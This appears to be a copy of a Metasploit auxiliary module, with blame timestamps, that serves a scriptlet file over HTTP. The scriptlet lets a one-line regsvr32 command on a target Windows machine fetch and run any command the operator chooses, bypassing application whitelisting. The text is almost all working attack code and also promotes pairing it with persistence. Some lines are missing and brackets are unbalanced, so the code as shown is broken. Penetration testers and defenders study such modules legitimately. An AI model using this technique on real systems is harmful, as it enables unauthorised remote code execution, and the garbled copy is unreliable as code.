2016-06-13 20:14:39 +00:00
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf :: Auxiliary
include Msf :: Exploit :: Remote :: HttpServer
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'Regsvr32.exe (.sct) Command Delivery Server' ,
'Description' = > %q(
This module uses the Regsvr32 . exe Application Whitelisting Bypass technique as a way to run a command on
a target system . The major advantage of this technique is that you can execute a static command on the target
system and dynamically and remotely change the command that will actually run ( by changing the value of CMD ) .
This is useful when combined with persistence methods ( e . g . , a recurring scheduled task ) or when flexibility
is needed through the use of a single command ( e . g . , as Rubber Ducky payload ) .
) ,
'License' = > MSF_LICENSE ,
'Author' = >
'Casey Smith' , # AppLocker bypass research and vulnerability discovery (@subTee)
'Trenton Ivey' , # MSF Module (kn0)
'mubix' , # Auxiliary module idea
] ,
'References' = >
[ 'URL' , 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html' ]
) )
register_options (
OptString . new ( 'CMD' , [ false , 'The command to execute' , '' ] )
] )
def run
2016-06-15 10:27:27 +00:00
def primer
2016-06-13 20:14:39 +00:00
print_status ( " Run the following command on the target machine: " )
print_line ( " regsvr32 /s /n /u /i: #{ get_uri } scrobj.dll " )
def on_request_uri ( cli , _request )
print_status ( " Handling request from #{ cli . peerhost } " )
data = gen_sct_file ( datastore [ 'CMD' ] )
send_response ( cli , data , 'Content-Type' = > 'text/plain' )
def rand_class_id
" #{ Rex :: Text . rand_text_hex 8 } - #{ Rex :: Text . rand_text_hex 4 } - #{ Rex :: Text . rand_text_hex 4 } - #{ Rex :: Text . rand_text_hex 4 } - #{ Rex :: Text . rand_text_hex 12 } "
def gen_sct_file ( command )
# If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).
if command == ''
return %{ <?XML version="1.0"?><scriptlet><registration progid=" #{ Rex :: Text . rand_text_alphanumeric 8 } " classid=" { #{ rand_class_id } } "></registration></scriptlet> }
# If a command is provided, tell the target system to execute it.
return %{ <?XML version="1.0"?><scriptlet><registration progid=" #{ Rex :: Text . rand_text_alphanumeric 8 } " classid=" { #{ rand_class_id } } "><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run(" #{ command } ",0);]]></script></registration></scriptlet> }